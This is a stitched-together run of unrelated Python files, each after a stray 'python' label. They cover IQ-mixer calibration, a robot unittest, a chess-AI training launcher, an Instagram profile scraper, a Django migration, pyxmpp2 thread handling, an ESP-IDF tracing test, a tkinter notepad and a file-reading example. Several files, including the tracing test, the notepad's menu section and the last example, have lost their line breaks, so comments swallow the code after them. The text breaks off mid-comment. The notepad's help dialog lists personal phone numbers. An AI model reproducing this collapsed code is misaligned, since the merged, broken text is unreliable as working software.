            int(np.floor((self.HDAWG_ports[1] - 1) / 2)), np.mod(self.HDAWG_ports[1] - 1, 2), 2 * signal + 1),
            -dphase_q)

    def set_dc_offsets(self, v1, v2):
        # Set I DC-offset
        self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[0] - 1), v1)
        # Set Q DC-offset
        self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[1] - 1), v2)

    def _average_marker_power(self, marker):
        total_sum = 0
        for i in range(self._averages):
            total_sum = total_sum + marker.get_power()
        return total_sum / self._averages

    def calc_slope_phase_and_amp(self, phase, q, signal, phase_step, q_step):
        # central finite difference of the lower sideband power
        self.set_phase_and_amp(phase + phase_step, q, signal)
        phase_p = self._average_marker_power(self.lower_sb_marker)
        self.set_phase_and_amp(phase - phase_step, q, signal)
        phase_m = self._average_marker_power(self.lower_sb_marker)
        self.set_phase_and_amp(phase, q + q_step, signal)
        q_p = self._average_marker_power(self.lower_sb_marker)
        self.set_phase_and_amp(phase, q - q_step, signal)
        q_m = self._average_marker_power(self.lower_sb_marker)
        return [(phase_p - phase_m) / 2, (q_p - q_m) / 2]

    def calc_slope_dc_offsets(self, vi, vq):
        # central finite difference of the carrier power
        self.set_dc_offsets(vi + self.vi_step, vq)
        vi_p = self._average_marker_power(self.carrier_marker)
        self.set_dc_offsets(vi - self.vi_step, vq)
        vi_m = self._average_marker_power(self.carrier_marker)
        self.set_dc_offsets(vi, vq + self.vq_step)
        vq_p = self._average_marker_power(self.carrier_marker)
        self.set_dc_offsets(vi, vq - self.vq_step)
        vq_m = self._average_marker_power(self.carrier_marker)
        return [(vi_p - vi_m) / 2, (vq_p - vq_m) / 2]
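
# Usage sketch (not part of the module): how a calibration run might be wired
# up. The client names below are hypothetical placeholders; in practice
# mw_client, hd_client and sa_client would be pylabnet clients for the
# microwave source, the HDAWG and the E4405B spectrum analyzer.
#
#     opt = IQOptimizer(mw_client, hd_client, sa_client,
#                       carrier=12.0e9, signal_freq=100e6,
#                       param_guess=[60, 0.6, 0.65, -0.002, 0.006])
#     opt.opt()   # minimizes the lower sideband first, then the carrier leakage
#
# The gradient-descent variant has the same entry point:
#
#     opt_gd = IQOptimizer_GD(mw_client, hd_client, sa_client,
#                             carrier=12.0e9, signal_freq=100e6)
#     opt_gd.opt()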
python
import unittest

from runner.robot.zipper import zip_robot


class RobotChanges(unittest.TestCase):

    def test_set_new_robot_position(self):
        robot1 = {
            'part': {
                'connects_to': [
                    {
                        'part': {}
                    }
                ]
            }
        }
        robot2 = {
            'part': {
                'connects_to': [
                    {
                        'part': {
                            'display_as': 'colored'
                        }
                    }
                ]
            }
        }
        zip_robot(robot1, robot2)
        self.assertEqual(robot1['part']['connects_to'][0]['part']['display_as'], 'colored')
python
items = [
    ("Mosh", 100),
    ("Brad", 90),
    ("Ahmed", 10),
]

# Map alternative (the loop variable is named `item`, not `items`,
# to avoid shadowing the list itself)
ratings = [item[1] for item in items]

# Filter alternative
ratings = [item[1] for item in items if item[1] >= 20]

print(ratings)
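
# For comparison, the built-in map/filter equivalents of the comprehensions
# above (same results; the comprehensions are usually considered more Pythonic):
ratings_map = list(map(lambda item: item[1], items))
ratings_filtered = list(map(lambda item: item[1],
                            filter(lambda item: item[1] >= 20, items)))
print(ratings_map)       # [100, 90, 10]
print(ratings_filtered)  # [100, 90]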
python
import sys
import chessai


def main():
    # parse script args
    startup_config = sys.argv[1] if len(sys.argv) >= 2 else 'all'

    # launch the training according to the specified startup config
    # (a single if/elif chain, so that a known config such as 'pretrain_fx'
    # never falls through to the ValueError below)
    if startup_config == 'pretrain_fx':
        launch_pretrain_fx()
    elif startup_config == 'pretrain_ratings':
        launch_pretrain_ratings()
    # TODO: add launching single other trainings here ...
    elif startup_config == 'all':
        launch_pretrain()
        launch_pretrain_ratings()
        # TODO: add launching other trainings here ...
    else:
        raise ValueError('Invalid args! Unknown training startup configuration {}!'.format(startup_config))


def launch_pretrain():
    # launch entire pre-training
    launch_pretrain_fx()


def launch_pretrain_fx():
    params = {
        'batch_size': 32,
        'learn_rate': 0.2,
        'epochs': 30,
        'lr_decay_epochs': 3,
        'lr_decay_rate': 0.5,
        'log_interval': 100,
        'total_train_batches': 2400,  # TODO: find out the exact value
    }

    # create a new training session and launch the training
    session = chessai.pretrain.DrawGenTrainingSession(params)
    session.run_training()

    # TODO: launch all other pre-train sessions here, too ...


def launch_pretrain_ratings():
    # frozen fx settings
    params = {
        'batch_size': 32,
        'learn_rate': 0.01,
        'epochs': 30,
        'lr_decay_epochs': 3,
        'lr_decay_rate': 0.1,
        'is_fx_trainable': False,
        'log_interval': 100,
        'total_train_batches': 2400,  # TODO: find out the exact value
    }

    # create a new training session and launch the training
    session = chessai.pretrain.RatingTrainingSession(params)
    session.run_training()


# def get_instance_by_name(fq_classname: str):
#     parts = fq_classname.split('.')
#     module = ".".join(parts[:-1])
#     m = __import__(module)
#     for comp in parts[1:]:
#         m = getattr(m, comp)
#     return m


if __name__ == '__main__':
    main()
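
# A table-driven alternative to the if/elif dispatch in main() (a sketch, not
# part of the original script): mapping config names to launcher callables makes
# it harder to forget a branch when new trainings are added.
#
#     LAUNCHERS = {
#         'pretrain_fx': launch_pretrain_fx,
#         'pretrain_ratings': launch_pretrain_ratings,
#         'all': lambda: (launch_pretrain(), launch_pretrain_ratings()),
#     }
#     launcher = LAUNCHERS.get(startup_config)
#     if launcher is None:
#         raise ValueError('Unknown training startup configuration {}!'.format(startup_config))
#     launcher()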
python
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 26 20:48:30 2016

Convert Instagram handles to numeric IDs, which are needed as inputs
for API queries.

Sample output

    ERROR: "not-a-handle" is not available

    IG user data
    ------------
    Platform: Instagram
    Followers: 394
    Handle: thedrawingroomcafe
    ID: 1711102403
    Full name: The Drawing Room
"""
import csv
import json

import requests
from bs4 import BeautifulSoup

import config_social_handles as config


def GetInstagramUserData(handle):
    """
    Load the HTML for a user's profile on www.instagram.com.
    Read fields like the user's numeric id from the profile HTML.

    Args
        handle: <type 'str'>
            Name of Instagram user. If it contains '@' then this will be
            removed.

    Returns
        out_dict: <type 'dict'>
            Dictionary of user fields and values.
    """
    handle = handle.replace("@", "")
    base = "http://instagram.com/%s/"
    url = base % handle

    # access webpage and convert to soup
    req = requests.get(url)
    soup = BeautifulSoup(req.text, "lxml")

    # search the scripts for the user profile data
    for script in soup.find_all(u"script", type=u"text/javascript"):
        text = script.text
        # break when the desired script is reached
        if "ProfilePage" in text:
            break

    # extract user profile from the script and convert to JSON
    json_start = text.find("{")
    json_end = text.find(";")
    json_string = text[json_start:json_end]
    json_data = json.loads(json_string)

    # get user data from JSON
    # - use [0] as there is only one item
    profile = json_data["entry_data"]["ProfilePage"][0]["user"]

    # extract user details
    out_dict = {}
    out_dict["Platform"] = "Instagram"
    out_dict["ID"] = profile["id"]
    out_dict["Full name"] = profile["full_name"]
    out_dict["Handle"] = handle  # OR profile['username'] from API
    out_dict["Followers"] = profile["followed_by"]["count"]

    return out_dict


def main():
    user_data = []

    IG_users = config.IG_users
    for h in IG_users:
        try:
            IG_user_data = GetInstagramUserData(h)
        except ValueError:
            IG_user_data = {"Handle": h, "ID": "NOT AVAILABLE"}
            print 'ERROR: "%s" is not available' % h
            print
        user_data.append(IG_user_data)

    print "IG user data"
    print "------------"
    for u in user_data:
        for k, v in u.iteritems():
            print "%s: %s" % (k, v)
        print

    out_name = "out_data.csv"
    with open(out_name, "w") as csvfile:
        fieldnames = ["Platform", "ID", "Handle", "Full name", "Followers"]
        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
        writer.writeheader()
        for user in user_data:
            # convert to UTF-8 if unicode, otherwise do not convert
            for key, value in user.iteritems():
                if isinstance(value, unicode):
                    encoded_value = value.encode("utf-8")
                    user[key] = encoded_value
            writer.writerow(user)
    print "Done - %s" % out_name


if __name__ == "__main__":
    main()
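
# The script expects a sibling module `config_social_handles.py` providing the
# handle list read via `config.IG_users`. A minimal example of its contents
# (the second handle is illustrative):
#
#     IG_users = [
#         "thedrawingroomcafe",
#         "@some_other_handle",  # a leading '@' is stripped by GetInstagramUserData
#     ]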
python
# Generated by Django 2.2.1 on 2020-09-20 01:31

from django.db import migrations


class Migration(migrations.Migration):

    dependencies = [
        ('chapters', '0013_auto_20200920_0042'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='orderablecontent',
            name='content_type',
        ),
        migrations.RemoveField(
            model_name='orderablecontent',
            name='object_id',
        ),
    ]
python
#
# (C) Copyright 2011 Jacek Konieczny <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License Version
# 2.1 as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
"""I/O Handling classes

This module has a purpose similar to :std:`asyncore` from the base library, but
should be more usable, especially for PyXMPP.

Also, these interfaces should allow building applications not only in the
asynchronous event loop model, but also in the threaded model.
"""

__docformat__ = "restructuredtext en"

import time
import threading
import logging
import sys
import queue
import inspect

from .interfaces import MainLoop, HandlerReady, PrepareAgain
from .interfaces import IOHandler, QUIT, EventHandler, TimeoutHandler
from .events import EventDispatcher
from ..settings import XMPPSettings
from .wait import wait_for_read, wait_for_write

logger = logging.getLogger("pyxmpp2.mainloop.threads")


class IOThread(object):
    """Base class for `ReadingThread` and `WrittingThread`.

    :Ivariables:
        - `name`: thread name (for debugging)
        - `io_handler`: the I/O handler object to poll
        - `thread`: the actual thread object
        - `exc_info`: this will hold exception information tuple for the
          last exception raised in the thread.
        - `exc_queue`: queue to put all exceptions raised in the thread.

    :Types:
        - `name`: `str`
        - `io_handler`: `IOHandler`
        - `thread`: :std:`threading.Thread`
        - `exc_info`: (type, value, traceback) tuple
    """
    def __init__(self, settings, io_handler, name, daemon = True,
                                                        exc_queue = None):
        # pylint: disable=R0913
        self.settings = settings if settings else XMPPSettings()
        self.name = name
        self.io_handler = io_handler
        self.thread = threading.Thread(name = name, target = self._run)
        self.thread.daemon = daemon
        self.exc_info = None
        self.exc_queue = exc_queue
        self._quit = False

    def start(self):
        """Start the thread.
        """
        self.thread.start()

    def is_alive(self):
        """Check if the thread is alive."""
        return self.thread.is_alive()

    def stop(self):
        """Request the thread to stop."""
        self._quit = True

    def join(self, timeout):
        """Join the thread (wait until it stops)."""
        return self.thread.join(timeout)

    def _run(self):
        """The thread function. Calls `self.run()` in a loop and, if it raises
        an exception, stores it in `self.exc_queue`. If `exc_queue` is None
        the exception will abort the thread.
        """
        logger.debug("{0}: entering thread".format(self.name))
        while True:
            try:
                self.run()
            except Exception:  # pylint: disable-msg=W0703
                self.exc_info = sys.exc_info()
                logger.debug("exception in the {0!r} thread:"
                                .format(self.name), exc_info = self.exc_info)
                if self.exc_queue:
                    self.exc_queue.put( (self, self.exc_info) )
                    continue
                else:
                    logger.debug("{0}: aborting thread".format(self.name))
                    return
            except:
                logger.debug("{0}: aborting thread".format(self.name))
                return
            break
        logger.debug("{0}: exiting thread".format(self.name))

    def run(self):
        """The thread function."""
        raise NotImplementedError


class ReadingThread(IOThread):
    """A thread reading from io_handler.

    This thread will be also the one to call the `IOHandler.prepare` method
    until `HandlerReady` is returned.

    It can be used (together with `WrittingThread`) instead of a main loop."""
    def __init__(self, settings, io_handler, name = None, daemon = True,
                                                        exc_queue = None):
        # pylint: disable=R0913
        if name is None:
            name = "{0!r} reader".format(io_handler)
        IOThread.__init__(self, settings, io_handler, name, daemon, exc_queue)

    def run(self):
        """The thread function.

        First, call the handler's 'prepare' method until it returns
        `HandlerReady`, then loop waiting for the socket input and calling
        'handle_read' on the handler.
        """
        # pylint: disable-msg=R0912
        interval = self.settings["poll_interval"]
        prepared = False
        timeout = 0.1
        while not self._quit:
            if not prepared:
                logger.debug("{0}: preparing handler: {1!r}".format(
                                                self.name, self.io_handler))
                ret = self.io_handler.prepare()
                logger.debug("{0}: prepare result: {1!r}".format(self.name,
                                                                        ret))
                if isinstance(ret, HandlerReady):
                    prepared = True
                elif isinstance(ret, PrepareAgain):
                    if ret.timeout is not None:
                        timeout = ret.timeout
                else:
                    raise TypeError("Unexpected result type from prepare()")
            if self.io_handler.is_readable():
                logger.debug("{0}: readable".format(self.name))
                fileno = self.io_handler.fileno()
                if fileno is not None:
                    readable = wait_for_read(fileno, interval)
                    if readable:
                        self.io_handler.handle_read()
            elif not prepared:
                if timeout:
                    time.sleep(timeout)
            else:
                logger.debug("{0}: waiting for readability".format(self.name))
                if not self.io_handler.wait_for_readability():
                    break


class WrittingThread(IOThread):
    """A thread writing to io_handler.

    It can be used (together with `ReadingThread`) instead of a main loop."""
    def __init__(self, settings, io_handler, name = None, daemon = True,
                                                        exc_queue = None):
        # pylint: disable=R0913
        if name is None:
            name = "{0!r} writer".format(io_handler)
        IOThread.__init__(self, settings, io_handler, name, daemon, exc_queue)

    def run(self):
        """The thread function.

        Loop waiting for the handler and socket being writable and calling
        `interfaces.IOHandler.handle_write`.
        """
        while not self._quit:
            interval = self.settings["poll_interval"]
            if self.io_handler.is_writable():
                logger.debug("{0}: writable".format(self.name))
                # fixed: the original assigned the handler object itself to
                # `fileno` instead of calling its fileno() method
                fileno = self.io_handler.fileno()
                if fileno is not None:
                    writable = wait_for_write(fileno, interval)
                    if writable:
                        self.io_handler.handle_write()
            else:
                logger.debug("{0}: waiting for writability".format(self.name))
                if not self.io_handler.wait_for_writability():
                    break


class EventDispatcherThread(object):
    """Event dispatcher thread.

    :Ivariables:
        - `name`: thread name (for debugging)
        - `event_queue`: the event queue to poll
        - `thread`: the actual thread object
        - `exc_info`: this will hold exception information tuple whenever the
          thread was aborted by an exception.

    :Types:
        - `name`: `str`
        - `event_queue`: :std:`Queue.Queue`
        - `thread`: :std:`threading.Thread`
        - `exc_info`: (type, value, traceback) tuple
    """
    def __init__(self, event_dispatcher, name = None,
                                            daemon = True, exc_queue = None):
        if name is None:
            name = "event dispatcher"
        self.name = name
        self.thread = threading.Thread(name = name, target = self.run)
        self.thread.daemon = daemon
        self.exc_info = None
        self.exc_queue = exc_queue
        self.event_dispatcher = event_dispatcher

    def start(self):
        """Start the thread."""
        self.thread.start()

    def is_alive(self):
        """Check if the thread is alive."""
        return self.thread.is_alive()

    def join(self, timeout):
        """Join the thread."""
        return self.thread.join(timeout)

    def run(self):
        """The thread function. Calls `self.event_dispatcher.loop()` in a loop
        and, if it raises an exception, stores it in `self.exc_info` and
        `self.exc_queue`.
        """
        logger.debug("{0}: entering thread".format(self.name))
        while True:
            try:
                self.event_dispatcher.loop()
            except Exception:  # pylint: disable-msg=W0703
                self.exc_info = sys.exc_info()
                logger.debug("exception in the {0!r} thread:"
                                .format(self.name), exc_info = self.exc_info)
                if self.exc_queue:
                    self.exc_queue.put( (self, self.exc_info) )
                    continue
                else:
                    logger.debug("{0}: aborting thread".format(self.name))
                    return
            except:
                logger.debug("{0}: aborting thread".format(self.name))
                return
            break
        logger.debug("{0}: exiting thread".format(self.name))


class TimeoutThread(object):
    """Thread to handle `TimeoutHandler` methods.

    :Ivariables:
        - `method`: the timeout handler method
        - `name`: thread name (for debugging)
        - `thread`: the actual thread object
        - `exc_info`: this will hold exception information tuple whenever the
          thread was aborted by an exception.
        - `exc_queue`: queue for raised exceptions

    :Types:
        - `name`: `str`
        - `method`: a bound method decorated with `interfaces.timeout_handler`
        - `thread`: :std:`threading.Thread`
        - `exc_info`: (type, value, traceback) tuple
        - `exc_queue`: queue for raised exceptions
    """
    def __init__(self, method, name = None, daemon = True, exc_queue = None):
        if name is None:
            # fixed: the format placeholder was never filled in
            name = "{0!r} timer thread".format(method)
        self.name = name
        self.method = method
        self.thread = threading.Thread(name = name, target = self._run)
        self.thread.daemon = daemon
        self.exc_info = None
        self.exc_queue = exc_queue
        self._quit = False

    def start(self):
        """Start the thread.
        """
        self.thread.start()

    def is_alive(self):
        """Check if the thread is alive."""
        return self.thread.is_alive()

    def stop(self):
        """Request the thread to stop."""
        self._quit = True

    def join(self, timeout):
        """Join the thread (wait until it stops)."""
        return self.thread.join(timeout)

    def _run(self):
        """The thread function. Calls `self.run()` and, if it raises an
        exception, stores it in `self.exc_info` and `self.exc_queue`.
        """
        logger.debug("{0}: entering thread".format(self.name))
        while True:
            try:
                self.run()
            except Exception:  # pylint: disable-msg=W0703
                self.exc_info = sys.exc_info()
                logger.debug("exception in the {0!r} thread:"
                                .format(self.name), exc_info = self.exc_info)
                if self.exc_queue:
                    self.exc_queue.put( (self, self.exc_info) )
                    continue
                else:
                    logger.debug("{0}: aborting thread".format(self.name))
                    return
            except:
                logger.debug("{0}: aborting thread".format(self.name))
                return
            break
        logger.debug("{0}: exiting thread".format(self.name))

    def run(self):
        """The thread function."""
        # pylint: disable-msg=W0212
        timeout = self.method._pyxmpp_timeout
        recurring = self.method._pyxmpp_recurring
        while not self._quit and timeout is not None:
            if timeout:
                time.sleep(timeout)
            if self._quit:
                break
            ret = self.method()
            if recurring is None:
                timeout = ret
            elif not recurring:
                break


class ThreadPool(MainLoop):
    """Thread pool object, as a replacement for an asynchronous event loop."""
    # pylint: disable-msg=R0902
    def __init__(self, settings = None, handlers = None):
        self.settings = settings if settings else XMPPSettings()
        self.io_handlers = []
        self.timeout_handlers = []
        self.event_queue = self.settings["event_queue"]
        self.event_dispatcher = EventDispatcher(self.settings, handlers)
        self.exc_queue = queue.Queue()
        self.io_threads = []
        self.timeout_threads = []
        self.event_thread = None
        self.daemon = False
        if handlers:
            for handler in handlers:
                self.add_handler(handler)

    def add_handler(self, handler):
        if isinstance(handler, IOHandler):
            self._add_io_handler(handler)
        if isinstance(handler, EventHandler):
            self.event_dispatcher.add_handler(handler)
        if isinstance(handler, TimeoutHandler):
            self._add_timeout_handler(handler)

    def remove_handler(self, handler):
        if isinstance(handler, IOHandler):
            self._remove_io_handler(handler)
        if isinstance(handler, EventHandler):
            self.event_dispatcher.remove_handler(handler)
        if isinstance(handler, TimeoutHandler):
            self._remove_timeout_handler(handler)

    def _add_io_handler(self, handler):
        """Add an IOHandler to the pool.
        """
        self.io_handlers.append(handler)
        if self.event_thread is None:
            return
        # fixed: threads were never started when a handler was added to an
        # already-running pool (mirrors _add_timeout_handler)
        self._run_io_threads(handler)

    def _run_io_threads(self, handler):
        """Start threads for an IOHandler.
        """
        reader = ReadingThread(self.settings, handler, daemon = self.daemon,
                                                    exc_queue = self.exc_queue)
        writter = WrittingThread(self.settings, handler, daemon = self.daemon,
                                                    exc_queue = self.exc_queue)
        self.io_threads += [reader, writter]
        reader.start()
        writter.start()

    def _remove_io_handler(self, handler):
        """Remove an IOHandler from the pool.
        """
        if handler not in self.io_handlers:
            return
        self.io_handlers.remove(handler)
        for thread in self.io_threads:
            if thread.io_handler is handler:
                thread.stop()

    def _add_timeout_handler(self, handler):
        """Add a TimeoutHandler to the pool.
        """
        self.timeout_handlers.append(handler)
        if self.event_thread is None:
            return
        self._run_timeout_threads(handler)

    def _run_timeout_threads(self, handler):
        """Start threads for a TimeoutHandler.
        """
        # pylint: disable-msg=W0212
        for dummy, method in inspect.getmembers(handler, callable):
            if not hasattr(method, "_pyxmpp_timeout"):
                continue
            thread = TimeoutThread(method, daemon = self.daemon,
                                                    exc_queue = self.exc_queue)
            self.timeout_threads.append(thread)
            thread.start()

    def _remove_timeout_handler(self, handler):
        """Remove a TimeoutHandler from the pool.
        """
        if handler not in self.timeout_handlers:
            return
        # fixed: the handler was being removed from io_handlers, and the
        # thread attribute is `method`, not `handler_method`
        self.timeout_handlers.remove(handler)
        for thread in self.timeout_threads:
            if thread.method.__self__ is handler:
                thread.stop()

    def start(self, daemon = False):
        """Start the threads."""
        self.daemon = daemon
        self.io_threads = []
        self.event_thread = EventDispatcherThread(self.event_dispatcher,
                                    daemon = daemon, exc_queue = self.exc_queue)
        self.event_thread.start()
        for handler in self.io_handlers:
            self._run_io_threads(handler)
        for handler in self.timeout_handlers:
            self._run_timeout_threads(handler)

    def stop(self, join = False, timeout = None):
        """Stop the threads.

        :Parameters:
            - `join`: join the threads (wait until they exit)
            - `timeout`: maximum time (in seconds) to wait when `join` is
              `True`. No limit when `timeout` is `None`.
        """
        logger.debug("Closing the io handlers...")
        for handler in self.io_handlers:
            handler.close()
        if self.event_thread.is_alive():
            logger.debug("Sending the QUIT signal")
            self.event_queue.put(QUIT)
            logger.debug("  sent")
        threads = self.io_threads + self.timeout_threads
        for thread in threads:
            logger.debug("Stopping thread: {0!r}".format(thread))
            thread.stop()
        if not join:
            return
        if self.event_thread:
            threads.append(self.event_thread)
        if timeout is None:
            for thread in threads:
                thread.join()
        else:
            timeout1 = (timeout * 0.01) / len(threads)
            threads_left = []
            for thread in threads:
                logger.debug("Quick-joining thread {0!r}...".format(thread))
                thread.join(timeout1)
                if thread.is_alive():
                    logger.debug("  thread {0!r} is still alive".format(thread))
                    threads_left.append(thread)
            if threads_left:
                timeout2 = (timeout * 0.99) / len(threads_left)
                for thread in threads_left:
                    logger.debug("Joining thread {0!r}...".format(thread))
                    thread.join(timeout2)
        self.io_threads = []
        self.event_thread = None

    @property
    def finished(self):
        return self.event_thread is None or not self.event_thread.is_alive()

    @property
    def started(self):
        return self.event_thread is not None

    def quit(self):
        self.event_queue.put(QUIT)

    def loop(self, timeout = None):
        if not self.event_thread:
            return
        interval = self.settings["poll_interval"]
        if timeout is None:
            while self.event_thread.is_alive():
                self.loop_iteration(interval)
        else:
            timeout = time.time() + timeout
            while self.event_thread.is_alive() and time.time() < timeout:
                self.loop_iteration(interval)

    def loop_iteration(self, timeout = 0.1):
        """Wait up to `timeout` seconds, raise any exception from the
        threads.
        """
        try:
            exc_info = self.exc_queue.get(True, timeout)[1]
        except queue.Empty:
            return
        exc_type, exc_value, ext_stack = exc_info
        # re-raise the original exception with its original traceback
        # (fixed: the original wrapped the exception instance in a new one)
        raise exc_value.with_traceback(ext_stack)
python
# encoding: utf-8 """ @version: v1.0 @author: Richard @license: Apache Licence @contact: [email protected] @site: @software: PyCharm @time: 2019/11/30 20:03 """
python
from __future__ import unicode_literals import os import re import tempfile from io import open import debug_backend import ttfw_idf @ttfw_idf.idf_example_test(env_tag='test_jtag_arm') def test_examples_sysview_tracing_heap_log(env, extra_data): rel_project_path = os.path.join('examples', 'system', 'sysview_tracing_heap_log') dut = env.get_dut('sysview_tracing_heap_log', rel_project_path) proj_path = os.path.join(dut.app.idf_path, rel_project_path) elf_path = os.path.join(dut.app.binary_path, 'sysview_tracing_heap_log.elf') def get_temp_file(): with tempfile.NamedTemporaryFile(delete=False) as f: return f.name try: tempfiles = [get_temp_file(), get_temp_file()] with open(os.path.join(proj_path, 'gdbinit')) as f_in, open(tempfiles[0], 'w') as f_out: new_content = f_in.read() # localhost connection issue occurs in docker unless: new_content = new_content.replace(':3333', '127.0.0.1:3333', 1) new_content = new_content.replace('file:///tmp/heap_log.svdat', 'file://{}'.format(tempfiles[1]), 1) f_out.write(new_content) with ttfw_idf.OCDBackend(os.path.join(proj_path, 'openocd.log'), dut.app.target): dut.start_app() dut.expect('esp_apptrace: Initialized TRAX on CPU0') gdb_log = os.path.join(proj_path, 'gdb.log') gdb_workdir = os.path.join(proj_path, 'main') with ttfw_idf.GDBBackend(gdb_log, elf_path, dut.app.target, tempfiles[0], gdb_workdir) as p: for _ in range(2): # There are two breakpoints p.gdb.wait_target_state(debug_backend.TARGET_STATE_RUNNING) stop_reason = p.gdb.wait_target_state(debug_backend.TARGET_STATE_STOPPED) assert stop_reason == debug_backend.TARGET_STOP_REASON_BP, 'STOP reason: {}'.format(stop_reason) # dut has been restarted by gdb since the last dut.expect() dut.expect('esp_apptrace: Initialized TRAX on CPU0') with ttfw_idf.CustomProcess(' '.join([os.path.join(dut.app.idf_path, 'tools/esp_app_trace/sysviewtrace_proc.py'), '-p', '-b', elf_path, tempfiles[1]]), logfile='sysviewtrace_proc.log') as sysviewtrace: sysviewtrace.pexpect_proc.expect(re.compile(r'Found \d+ leaked bytes in \d+ blocks.'), timeout=120) finally: for x in tempfiles: try: os.unlink(x) except Exception: pass if __name__ == '__main__': test_examples_sysview_tracing_heap_log()
python
from tkinter import *
from tkinter.messagebox import showinfo,askyesnocancel
from tkinter.filedialog import askopenfilename,asksaveasfilename
import os
from tkinter import simpledialog

def new(event=None):        #.................creates a new file, offering to save the current one...........#
    global file
    var=askyesnocancel("New..","Do you want to save your document")
    if(var!=None):
        if(var==True):
            saveas()
        if(file!=None):
            root.title("Untitled - J_PAD")
            file=None
        text.delete(1.0,END)

def openfile(event=None):   #.................opens the chosen file in J_PAD...........#
    global file
    file=askopenfilename(defaultextension=".txt",filetypes=[("All files","*.*"),("Text Document","*.txt")])
    if file == "":          #.................checks whether a file was chosen...........#
        file=None
    else:
        root.title(os.path.basename(file)+"-J_PAD")
        text.delete(1.0,END)
        f=open(file,"r")
        text.insert(1.0,f.read())
        f.close()

def saveas(event=None):     #.................saves a known file under its own name; asks for a name for untitled files...........#
    global file
    if file==None:          #.................checks whether the file is untitled or known...........#
        file = asksaveasfilename(initialfile='Untitled.txt',defaultextension=".txt",filetypes=[("All files","*.*"),("Text Document","*.txt")])
        if file =="":       #.................checks whether a name was chosen...........#
            file=None
        else:
            f=open(file,"w")
            f.write(text.get(1.0,END))
            f.close()
            root.title(os.path.basename(file)+"-J_PAD")
    else:
        f=open(file,"w")    #.................writes to the existing file...........#
        f.write(text.get(1.0,END))
        f.close()

def exitroot(event=None):   #.................exits the main loop...........#
    var=askyesnocancel(title=f"QUIT-{file}",message="Do you want to save the file before exit..")
    if(var!=None):
        if(var==True):
            saveas()
        root.destroy()

def copy(event=None):       #.................handles the copy operation...........#
    text.event_generate("<<Copy>>")

def paste(event=None):      #.................handles the paste operation...........#
    text.event_generate("<<Paste>>")

def selectall(event=None):  #.................selects all the text in the file...........#
    text.tag_add(SEL,"1.0",END)
    text.mark_set(INSERT,"1.0")
    text.see(INSERT)
    return 'break'

def cut(event=None):        #.................handles the cut operation...........#
    text.event_generate("<<Cut>>")

def find(event=None):       #.................counts the occurrences of a given word...........#
    findstr=simpledialog.askstring("Find...","Enter the text you want to search")
    if not findstr:         #.................dialog cancelled or empty input...........#
        return
    textstr=text.get(1.0,END)
    occurrence=textstr.count(findstr)
    showinfo("Find...",f"{findstr} has {occurrence} occurrence(s) in the text")

def about(event=None):      #.................about J_PAD...........#
    showinfo("J-PAD","Text editor by Himanshu")

def help(event=None):       #.................shows contact information for help...........#
    showinfo("Help...","For any help mail your queries to [email protected]\nContact on given numbers :- 9548609762 9761594415")

file=None

#.............................Main window layout......................#
root=Tk()                                       #...................creates a new window...............#
root.wm_iconbitmap("1.ico")
root.title("Untitled-J_PAD")                    #..................title of the root............#
root.geometry("1000x800")                       #...................initial geometry of the root.........#

scrollbarx=Scrollbar(root)                      #....................add a scroll bar................#
scrollbarx.pack(side=RIGHT,fill=Y)
text = Text(root,font="comicsansms 11 bold")    #....................text area of the editor..........#
text.pack(expand=True,fill=BOTH)
text.config(yscrollcommand=scrollbarx.set)      #....................let the text widget drive the scrollbar...........#
scrollbarx.config(command=text.yview) 
#....................fix scroll bar with y view of text area...........# menubar=Menu(root) #..............................Menu bar......................# #.....................file menu......................# filemenu=Menu(menubar,tearoff=0) filemenu.add_command(label="New",command=new,accelerator="Ctrl+N") root.bind_all("<Control-N>",new) #..........binds function with key press.........# root.bind_all("<Control-n>",new) filemenu.add_command(label="Open",command=openfile,accelerator="Ctrl+O") root.bind_all("<Control-o>",openfile) #..........binds function with key press.........# root.bind_all("<Control-O>",openfile) filemenu.add_command(label="Save As",command=saveas,accelerator="Ctrl+S") root.bind_all("<Control-s>",saveas) #..........binds function with key press.........# root.bind_all("<Control-S>",saveas) filemenu.add_separator() filemenu.add_command(label="Exit",command=exitroot,accelerator="Ctrl+Q") root.bind_all("<Control-q>",exitroot) #..........binds function with key press.........# root.bind_all("<Control-Q>",exitroot) menubar.add_cascade(label="File",menu=filemenu) #.....................edit menu......................# editmenu=Menu(menubar,tearoff=0) editmenu.add_command(label="Copy",command=copy,accelerator="Ctrl+C") root.bind_all("<Control-C>",copy) #..........binds function with key press.........# root.bind_all("<Control-c>",copy) editmenu.add_command(label="Paste",command=paste,accelerator="Ctrl+V") root.bind_all("<Control-v>",paste) #..........binds function with key press.........# root.bind_all("<Control-V>",paste) editmenu.add_command(label="Cut",command=cut,accelerator="Ctrl+X") root.bind_all("<Control-X>",cut) #..........binds function with key press.........# root.bind_all("<Control-x>",cut) editmenu.add_separator() editmenu.add_command(label="Select All",command=selectall,accelerator="Ctrl+A") root.bind_all("<Control-A>",selectall) #..........binds function with key press.........# root.bind_all("<Control-a>",selectall) editmenu.add_command(label="Find",command=find,accelerator="Ctrl+F") root.bind_all("<Control-F>",find) #..........binds function with key press.........# root.bind_all("<Control-f>",find) menubar.add_cascade(label="Edit",menu=editmenu) #.....................help menu......................# helpmenu=Menu(menubar,tearoff=0) helpmenu.add_command(label="Help",command=help) helpmenu.add_command(label="About",command=about) menubar.add_cascade(label="Help",menu=helpmenu) root.config(menu=menubar) root.mainloop() #..........................starts root.................#
python
#!/usr/bin/env python # -*- encoding: utf-8 -*- """ Topic: 读写文本文件 Desc : """ def rw_text(): # Iterate over the lines of the file with open('somefile.txt', 'rt') as f: for line in f: # process line print(line) # Write chunks of text data with open('somefile.txt', 'wt') as f: f.write('text1') f.write('text2') if __name__ == '__main__': rw_text()
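
# A hedged variant of the pattern above (added for illustration): the same
# read/write calls with an explicit encoding, so the result does not depend
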